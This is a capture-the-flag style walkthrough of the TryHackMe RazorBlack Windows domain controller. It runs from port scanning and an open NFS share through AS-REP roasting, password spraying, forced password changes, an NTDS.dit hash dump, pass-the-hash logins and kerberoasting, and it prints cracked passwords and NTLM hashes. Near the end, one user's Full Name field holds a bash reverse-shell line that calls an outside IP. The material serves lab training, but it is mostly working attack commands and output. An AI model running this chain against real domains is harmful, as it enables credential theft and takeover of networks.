Initial Recon & Enumeration
First let’s make a variable, TARGET, to replace possibly changing IP addresses
rob:RazorBlack/ $ export TARGET=10.10.10.10
rob:RazorBlack/ $ echo $TARGET
10.10.10.10
The machine has some instructions
The box has ICMP enabled. So, look at ping first before starting recon and stop slapping
-Pnon nmap
Ok, let’s look at ping then as instructed
rob:RazorBlack/ $ ping -c 2 $TARGET
PING 10.10.10.10 (10.10.10.10) 56(84) bytes of data.
64 bytes from 10.10.10.10: icmp_seq=1 ttl=127 time=20.0 ms
64 bytes from 10.10.10.10: icmp_seq=2 ttl=127 time=18.5 ms
--- 10.10.10.10 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1757ms
rtt min/avg/max/mdev = 18.450/19.233/20.016/0.783 ms
Seems pretty normal, maybe this is important later on
Let’s begin now with a scan, first masscan to capture both UDP and TCP ports
rob:RazorBlack/ $ sudo masscan -p1-65535,U:1-65535 $TARGET --rate=1000 -e tun0
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-21 15:59:20 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 63893/udp on 10.10.10.10
Discovered open port 389/tcp on 10.10.10.10
Discovered open port 49665/tcp on 10.10.10.10
Discovered open port 49664/tcp on 10.10.10.10
Discovered open port 49669/tcp on 10.10.10.10
Discovered open port 593/tcp on 10.10.10.10
Discovered open port 49694/tcp on 10.10.10.10
Discovered open port 139/tcp on 10.10.10.10
Discovered open port 636/tcp on 10.10.10.10
Discovered open port 3268/tcp on 10.10.10.10
Discovered open port 2049/tcp on 10.10.10.10
Discovered open port 49676/tcp on 10.10.10.10
Discovered open port 445/tcp on 10.10.10.10
Discovered open port 63924/udp on 10.10.10.10
Discovered open port 49672/tcp on 10.10.10.10
Discovered open port 5985/tcp on 10.10.10.10
Discovered open port 53/tcp on 10.10.10.10
Discovered open port 49666/tcp on 10.10.10.10
Discovered open port 49708/tcp on 10.10.10.10
Discovered open port 3389/tcp on 10.10.10.10
Discovered open port 135/tcp on 10.10.10.10
Discovered open port 63216/udp on 10.10.10.10
Discovered open port 49855/tcp on 10.10.10.10
Discovered open port 49675/tcp on 10.10.10.10
Discovered open port 111/tcp on 10.10.10.10
Discovered open port 9389/tcp on 10.10.10.10
Discovered open port 3269/tcp on 10.10.10.10
Discovered open port 47001/tcp on 10.10.10.10
Discovered open port 49679/tcp on 10.10.10.10
Discovered open port 62512/udp on 10.10.10.10
Discovered open port 464/tcp on 10.10.10.10
Discovered open port 88/tcp on 10.10.10.10
Ok, a lot of ports open there. A quick look through them tells us this is (most likely) a Windows machine (RDP, WINRM, etc.). Let’s send these ports to nmap and get some more details
rob:RazorBlack/ $ nmap -A -v -p53,88,111,135,139,389,445,464,593,636,2049,3268,3269,5985,9389 $TARGET
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 17:43 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Initiating Ping Scan at 17:43
Scanning 10.10.10.10 [2 ports]
Completed Ping Scan at 17:43, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:43
Completed Parallel DNS resolution of 1 host. at 17:43, 0.03s elapsed
Initiating Connect Scan at 17:43
Scanning 10.10.10.10 [15 ports]
Discovered open port 135/tcp on 10.10.10.10
Discovered open port 139/tcp on 10.10.10.10
Discovered open port 445/tcp on 10.10.10.10
Discovered open port 111/tcp on 10.10.10.10
Discovered open port 53/tcp on 10.10.10.10
Discovered open port 88/tcp on 10.10.10.10
Discovered open port 2049/tcp on 10.10.10.10
Discovered open port 464/tcp on 10.10.10.10
Discovered open port 5985/tcp on 10.10.10.10
Discovered open port 9389/tcp on 10.10.10.10
Discovered open port 389/tcp on 10.10.10.10
Discovered open port 636/tcp on 10.10.10.10
Discovered open port 593/tcp on 10.10.10.10
Completed Connect Scan at 17:43, 0.02s elapsed (15 total ports)
Initiating Service scan at 17:43
Scanning 13 services on 10.10.10.10
Completed Service scan at 17:44, 32.28s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.10.10.
Initiating NSE at 17:44
Completed NSE at 17:46, 125.63s elapsed
Initiating NSE at 17:46
Completed NSE at 17:46, 7.22s elapsed
Initiating NSE at 17:46
Completed NSE at 17:46, 0.00s elapsed
Nmap scan report for 10.10.10.10
Host is up (0.011s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-21 16:44:01Z)
111/tcp open rpcbind?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: REDACTED, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open mountd 1-3 (RPC #100005)
3268/tcp closed globalcatLDAP
3269/tcp closed globalcatLDAPssl
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.00:
|_ Message signing enabled and required
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
Initiating NSE at 17:46
Completed NSE at 17:46, 0.00s elapsed
Initiating NSE at 17:46
Completed NSE at 17:46, 0.00s elapsed
Initiating NSE at 17:46
Completed NSE at 17:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.58 seconds
Excellent, nmap has given us the first flag, the domain name, #1: REDACTED
Let’s first try to enumerate some of the low-hanging fruit, starting with SMB
rob:RazorBlack/ $ smbclient -L $TARGET -U "" -N
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
Ok, there are no shares accessible there. We can see that NFS is also available, let’s try that
rob:RazorBlack/ $ showmount -e $TARGET
Export list for 10.10.10.10:
/users (everyone)
Excellent, we can see a share, and it’s open for everyone. Let’s try mounting that and see what we can find
rob:RazorBlack/ $ sudo mount -t nfs -o vers=2 $TARGET:/users $PWD/temp -o nolock
rob:RazorBlack/ $ ls -la
total 9
drwxr-xr-x 3 rob rob 4096 Jul 21 18:03 .
drwxr-xr-x 58 rob rob 4096 Jul 21 16:21 ..
drwx------ 2 4294967294 4294967294 64 Feb 27 17:24 temp
Ok, we’ve got a folder here that can only be accessed by the user with UID 4294967294! We can either create such a user locally or we can just become root, let’s do the latter!
rob:RazorBlack/ $ sudo -i
┌──(root💀kali)-[~]
└─# cd /home/allfun/Documents/TryHackMe/RazorBlack/temp
┌──(root💀kali)-[/home/rob/Documents/TryHackMe/RazorBlack/temp]
└─# ls -la
total 7
drwx------ 2 4294967294 4294967294 64 Feb 27 17:24 .
drwxr-xr-x 3 rob rob 4096 Jul 21 18:03 ..
-rwx------ 1 4294967294 4294967294 9861 Feb 25 16:24 employee_status.xlsx
-rwx------ 1 4294967294 4294967294 80 Feb 25 19:31 sbradley.txt
┌──(root💀kali)-[/home/rob/Documents/TryHackMe/RazorBlack/temp]
└─# cp * ..
We find two files, hopefully with some useful content! First we try sbradley.txt
└─# cat sbradley.txt
��`REDACTED`
And we’ve found Steven’s flag, #2: REDACTED
In the excel file we find a table of names and roles for the HAVEN SECRET HACKER's CLUB
| Name | Role |
|---|---|
| daven port | CTF PLAYER |
| imogen royce | CTF PLAYER |
| tamara vidal | CTF PLAYER |
| arthur edwards | CTF PLAYER |
| carl ingram | CTF PLAYER (INACTIVE) |
| nolan cassidy | CTF PLAYER |
| reza zaydan | CTF PLAYER |
| ljudmila vetrova | CTF PLAYER, DEVELOPER,ACTIVE DIRECTORY ADMIN |
| rico delgado | WEB SPECIALIST |
| tyson williams | REVERSE ENGINEERING |
| steven bradley | STEGO SPECIALIST |
| chamber lin | CTF PLAYER(INACTIVE) |
Given that we’ve seen the username pattern used in the organisation earlier with sbradley we can use this table to create a potential username list if we’d like to try password spraying etc.
Let’s see if we can use cme (crackmapexec) to find a password, first using winrm
rob:RazorBlack/ $ docker run --rm byt3bl33d3r/crackmapexec winrm $TARGET -u usernames.txt -p /usr/share/wordlists/fasttrack.txt
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
WINRM 10.10.10.10 5985 HAVEN-DC [*] Windows 10.0 Build 17763 (name:HAVEN-DC) (domain:raz0rblack.thm)
WINRM 10.10.10.10 5985 HAVEN-DC [*] http://10.10.10.10:5985/wsman
WINRM 10.10.10.10 5985 HAVEN-DC [-] raz0rblack.thm\usernames.txt:/usr/share/wordlists/fasttrack.txt
We mess about with this for a while without success. Perhaps we will have more joy looking for users that we can extract a TGT from with impacket’s GetNPUsers.py
rob:RazorBlack/ $ impacket-GetNPUsers -usersfile usernames.txt -dc-ip 10.10.10.10 raz0rblack.thm/
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:022e8f46e973d9b3d7d2dffe1bd97b7c$104ebf50bc7d0ae84c2d3c79fdd38de496ee37a81cc9d0158ec7cddc826881b15f34ec3213c3acf07b8398ebea3cc9acdc654218bcb6eb067547a4575d6bda3fd135865181f5ba739f37c4c34cfcabbf985b3a075574e153540ec16b4c3856f080c56dcdac21bcba5b4812343daffdf226480ab3541b315980d091fd6f307b57fc3d40b311a2bdc6a14cf1e0d457ff60df7ad63d0d0ff0e454f2074a19441e84a6431fd24857f6eff3fc445a477d336a2380612b2f7182ceb1ac0ce77f33d90b67053c5b55ad3c3da8e25a5b16542ff0e561d73ae2cd4cb10e73208654cc71ee881304de033c380c9d67abfd1ea442c9
[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Ok, we have found a hash for twilliams, let’s see if we can crack it
rob:RazorBlack/ $ john jwilliams.hash -w=/usr/share/wordlists/rockyou.txt --format=krb5asrep
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
roastpotatoes ($krb5asrep$twilliams@RAZ0RBLACK.THM)
1g 0:00:00:02 DONE (2021-07-22 01:13) 0.4329g/s 1828Kp/s 1828Kc/s 1828KC/s robaviejas..roadblock714
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we can, we get creds jwilliams:roastpotatoes, we can try enumerating SMB now as this user
rob:RazorBlack/ $ smbclient -L //raz0rblack.thm/ -I 10.10.26.178 -U jwilliams
Enter WORKGROUP\jwilliams's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Hmmm, surely that should have worked? Let’s see if the password is reused at all, we can go back to crackmapexec for this
# cme smb 10.10.26.178 -u usernames.txt -p roastpotatoes --continue-on-success
SMB 10.10.26.178 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\dport:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\iroyce:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\tvidal:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\aedwards:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\cingram:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\ncassidy:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\rzaydan:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\rdelgado:roastpotatoes STATUS_LOGON_FAILURE
SMB 10.10.26.178 445 HAVEN-DC [+] raz0rblack.thm\twilliams:roastpotatoes
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.26.178 445 HAVEN-DC [-] raz0rblack.thm\clin:roastpotatoes STATUS_LOGON_FAILURE
Steven
Interesting, again here we see that the password seems to work for jwilliams and yet it did not work for us! However we have found something interesting, the same password also seems to be used by sbradley and needs to be changed. We can use smbpasswd to do this
rob:RazorBlack/ $ smbpasswd -r 10.10.26.178 -U sbradley
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user sbradley
Alright then, we have (what should be working) SMB creds, sbradley:password. Let’s attempt again to enumerate SMB
rob:RazorBlack/ $ smbclient -L 10.10.26.178 -U sbradley
Enter WORKGROUP\sbradley's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
trash Disk Files Pending for deletion
SMB1 disabled -- no workgroup available
Excellent, we can finally see some shares!
Let’s connect and see if there’s anything useful in the trash
rob:RazorBlack/ $ smbclient //10.10.26.178/trash -U sbradley
Enter WORKGROUP\sbradley's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 16 06:01:28 2021
.. D 0 Tue Mar 16 06:01:28 2021
chat_log_20210222143423.txt A 1340 Thu Feb 25 19:29:05 2021
experiment_gone_wrong.zip A 18927164 Tue Mar 16 06:02:20 2021
sbradley.txt A 37 Sat Feb 27 19:24:21 2021
5101823 blocks of size 4096. 961087 blocks available
smb: \> mget *
Get file chat_log_20210222143423.txt? y
getting file \chat_log_20210222143423.txt of size 1340 as chat_log_20210222143423.txt (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)
Get file experiment_gone_wrong.zip? y
getting file \experiment_gone_wrong.zip of size 18927164 as experiment_gone_wrong.zip (2459.2 KiloBytes/sec) (average 2418.5 KiloBytes/sec)
Get file sbradley.txt? y
getting file \sbradley.txt of size 37 as sbradley.txt (0.3 KiloBytes/sec) (average 2384.5 KiloBytes/sec)
smb: \> exit
Ok, 3 files found there and downloaded for examination. We check C$ and ADMIN$ too but are ‘NT_STATUS_ACCESS_DENIED’
The sbradley.txt file contains the same flag we found via NFS earlier. We seem to get a good hint with the chat_log_*.txt file
rob:RazorBlack/ $ cat chat_log_20210222143423.txt
sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access..........
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there ...
sbradley> Administrator .....
The administrator died after this incident.
Press F to pay respects
Ok, so we have a ‘ZeroLogon’ vulnerability apparently. Let’s see if we can get into that last file, the .zip file and extract the goodies that sbradley was talking about
rob:RazorBlack/ $ zip2john experiment_gone_wrong.zip > zip.hash
ver 2.0 efh 5455 efh 7875 experiment_gone_wrong.zip/system.hive PKZIP Encr: 2b chk, TS_chk, cmplen=2941739, decmplen=16281600, crc=BDCCA7E2
ver 2.0 efh 5455 efh 7875 experiment_gone_wrong.zip/ntds.dit PKZIP Encr: 2b chk, TS_chk, cmplen=15985077, decmplen=58720256, crc=68037E87
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
rob:RazorBlack/ $ john zip.hash -w=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
`REDACTED` (experiment_gone_wrong.zip)
1g 0:00:00:00 DONE (2021-07-22 02:04) 1.075g/s 9020Kp/s 9020Kc/s 9020KC/s elephantmeee..ejazzie13
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Great, we found #3: REDACTED
Using the password now to extract the zipped files we find 2 system files that we should be able to dump credentials from
rob:zipfiles/ $ unzip -P electromagnetismo ../experiment_gone_wrong.zip
Archive: ../experiment_gone_wrong.zip
inflating: system.hive
inflating: ntds.dit
rob:zipfiles/ $ ls -lA
total 73244
-rwxr-xr-x 1 rob rob 58720256 Mar 16 05:33 ntds.dit
-rwxr-xr-x 1 rob rob 16281600 Mar 16 05:38 system.hive
We can go back to the impacket tools for this and use secretsdump.py
rob:zipfiles/ $ impacket-secretsdump -ntds ntds.dit -system system.hive local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x17a0a12951d502bb3c14cf1d495a71ad
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 84bf0a79cd645db4f94b24c35cfdf7c7
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:4ea59b8f64c94ec66ddcfc4e6e5899f9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:703a365974d7c3eeb80e11dd27fb0cb3:::
RAZ0RBLACK\j.smith:4549:aad3b435b51404eeaad3b435b51404ee:da3542420eff7cfab8305a68b7da7043:::
RAZ0RBLACK\j.johnson:4550:aad3b435b51404eeaad3b435b51404ee:c378739d7c136c1281d06183665702ea:::
--snip--
RAZ0RBLACK\c.barnhart:aes128-cts-hmac-sha1-96:c92201cf2fe91f0539ecdc750cbbc287
RAZ0RBLACK\c.barnhart:des-cbc-md5:c126d0435119526b
[*] Cleaning up...
And we get about 6000 lines dumped (hence the ‘–snip–’ above!)
Now, in the table we found earlier we saw that Ljudmila is the AD admin
| Name's | Role |
| ---------------- | -------------------------------------------- |
| ljudmila vetrova | CTF PLAYER, DEVELOPER,ACTIVE DIRECTORY ADMIN |
Let’s see what we can find in the way of Admin hashes
rob:zipfiles/ $ grep -i admin *
secretsdump.hash.ntds:Administrator:500:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0:::
secretsdump.hash.ntds.kerberos:Administrator:aes256-cts-hmac-sha1-96:1f435bd4ebd10a6d6a777eecd6354f690036c8f695844ee71468cd77ec9edb93
secretsdump.hash.ntds.kerberos:Administrator:aes128-cts-hmac-sha1-96:1db214970c0e11eea7f98968f9ba9263
secretsdump.hash.ntds.kerberos:Administrator:des-cbc-md5:46e9b96eb35d236b
grep: system.hive: binary file matches
Hmmm, none of these seem right, perhaps she has another regular account. To use crackmapexec again to search for this we want only the NTLM hashes from the secretsdump.hash.ntds. This means taking the 4th field (using ‘:’ as a delimiter)
rob:zipfiles/ $ awk -F : '{print $4}' secretsdump.hash.ntds > ntlm.hashes
rob:zipfiles/ $ head ntlm.hashes
1afedc472d0fdfe07cd075d36804efd0
31d6cfe0d16ae931b73c59d7e0c089c0
4ea59b8f64c94ec66ddcfc4e6e5899f9
703a365974d7c3eeb80e11dd27fb0cb3
da3542420eff7cfab8305a68b7da7043
c378739d7c136c1281d06183665702ea
9f73aaafc3b6d62acdbb0b426f302f9e
6a5bad944868142e65ad3049a393e587
b112332330f11267486d21549d326bd5
f9b8c9864aa7bc53405ed45b48ef19ef
Ok, that looks good, let’s see if we can find Ljudmila now
# cme smb 10.10.62.129 -u lvetrova -H ntlm.hashes
SMB 10.10.62.129 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB 10.10.62.129 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:1afedc472d0fdfe07cd075d36804efd0 STATUS_LOGON_FAILURE
SMB 10.10.62.129 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
--snip--
SMB 10.10.62.129 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:c184a72ed800899bc1ff633778a89b5e STATUS_LOGON_FAILURE
SMB 10.10.62.129 445 HAVEN-DC [+] raz0rblack.thm\lvetrova REDACTED
And we got it (on the 3rd or 4th attempt with nothing changing, very weird!). This gives us Ljudmila’s hash, #4: REDACTED
Ljudmila
Now that we have what is (hopefully) someone with admin privileges, let’s see if we can log in now via evil-winrm
rob:RazorBlack/ $ /opt/evil-winrm/evil-winrm.rb -i 10.10.62.129 -u lvetrova -H f220d3988deb3f516c73f40ee16c431d
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\lvetrova\Documents>
And we have a shell!
We find one file in Ljudmila’s home folder, an xml file
*Evil-WinRM* PS C:\Users\lvetrova> type lvetrova.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">Your Flag is here =></S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009db56a0543f441469fc81aadb02945d20000000002000000000003660000c000000010000000069a026f82c590fa867556fe4495ca870000000004800000a0000000100000003b5bf64299ad06afde3fc9d6efe72d35500000002828ad79f53f3f38ceb3d8a8c41179a54dc94cab7b17ba52d0b9fc62dfd4a205f2bba2688e8e67e5cbc6d6584496d107b4307469b95eb3fdfd855abe27334a5fe32a8b35a3a0b6424081e14dc387902414000000e6e36273726b3c093bbbb4e976392a874772576d</SS>
</Props>
</Obj>
</Objs>
Some googling brings us to the fountain of knowledge that is stackoverflow and a method to import this XML using powershell
*Evil-WinRM* PS C:\Users\lvetrova> $credential = Import-CliXml -Path 'lvetrova.xml'
*Evil-WinRM* PS C:\Users\lvetrova> echo $credential
UserName Password
-------- --------
Your Flag is here => System.Security.SecureString
We should be able to decode the SecureString now with this approach
*Evil-WinRM* PS C:\Users\lvetrova> $ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($credential.password)
*Evil-WinRM* PS C:\Users\lvetrova> $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($ptr)
*Evil-WinRM* PS C:\Users\lvetrova> $result
`REDACTED`
And we’ve got the flag, #5: REDACTED
If we drop back to c:\users now we can find a new previously undiscovered user, xyan1d3, which we’ll add to our list of known usernames
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/25/2021 1:25 PM Administrator
d----- 2/25/2021 10:16 AM lvetrova
d-r--- 2/23/2021 6:21 AM Public
d----- 2/25/2021 10:20 AM twilliams
d----- 2/25/2021 9:34 AM xyan1d3
Let’s see what Ljudmila can do, do we have any admin rights as this user?
0;31m*Evil-WinRM* PS C:\Usernet user lvetrova
User name lvetrova
Full Name Ljudmila Vetrova
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 8:19:35 AM
Password expires Never
Password changeable 2/23/2021 8:19:35 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/15/2021 11:05:29 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Ok, now that we have a confirmed hash for Ljudmila, let’s try kerberoasting to see can we find any more, again the impacket tools rise to the occasion
rob:RazorBlack/ $ impacket-GetUserSPNs -dc-ip 10.10.10.10 raz0rblack.thm/lvetrova -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -outputfile kerb.hashes
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- ------- ---------------------------------------------------------- -------------------------- --------- ----------
HAVEN-DC/xyan1d3.raz0rblack.thm:60111 xyan1d3 CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm 2021-02-23 15:17:17.715160 <never>
This was a little tricky, we only had the NTLM hash from earlier and this command would not work. Reading the help in a little more detail showed it was expecting LMHASH:NTHASH. Simply duplicating the hash we had and supplying it twice was an effective way around
Anyway, now we have the hash for xyan1d3, we can use john again to try and crack it
rob:RazorBlack/ $ john kerb.hashes -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
`REDACTED` (?)
1g 0:00:00:03 DONE (2021-07-22 16:01) 0.2923g/s 2592Kp/s 2592Kc/s 2592KC/s cydweli..cy2802341
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we got #6, REDACTED
Xyan1d3
We can now login to see if we can get the flag for this user too
rob:evil-winrm/ (master) $ ./evil-winrm.rb -i 10.10.10.10 -u xyan1d3 -p cyanide9amine5628
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> cd ..
*Evil-WinRM* PS C:\Users\xyan1d3> ls
Directory: C:\Users\xyan1d3
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 9:34 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 9:33 AM 1826 xyan1d3.xml
Alright, we seem to have found another stored secure credentials file, let’s try the same technique again to unencode it
*Evil-WinRM* PS C:\Users\xyan1d3> $credential = Import-CliXml -Path 'xyan1d3.xml'
*Evil-WinRM* PS C:\Users\xyan1d3> $ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($credential.password)
*Evil-WinRM* PS C:\Users\xyan1d3> $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($ptr)
*Evil-WinRM* PS C:\Users\xyan1d3> $result
LOL here it is -> REDACTED
Success, we’ve found flag #7: REDACTED
A little enumeration shows us that xyan1d3 can list the Administrator’s home folder
*Evil-WinRM* PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
--snip--
-a---- 2/25/2021 1:08 PM 290 cookie.json
-a---- 2/25/2021 1:12 PM 2512 root.xml
This shows us a couple of interesting files, but we don’t have permissions sufficient to view them
Let’s check now what groups, and therefore permissions, that the user xyan1d3 has
*Evil-WinRM* PS C:\Users\xyan1d3> net user xyan1d3
User name xyan1d3
Full Name bash -i >&. /dev/tcp/10.8.156.189/8888 0>&1
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 8:17:17 AM
Password expires Never
Password changeable 2/23/2021 8:17:17 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
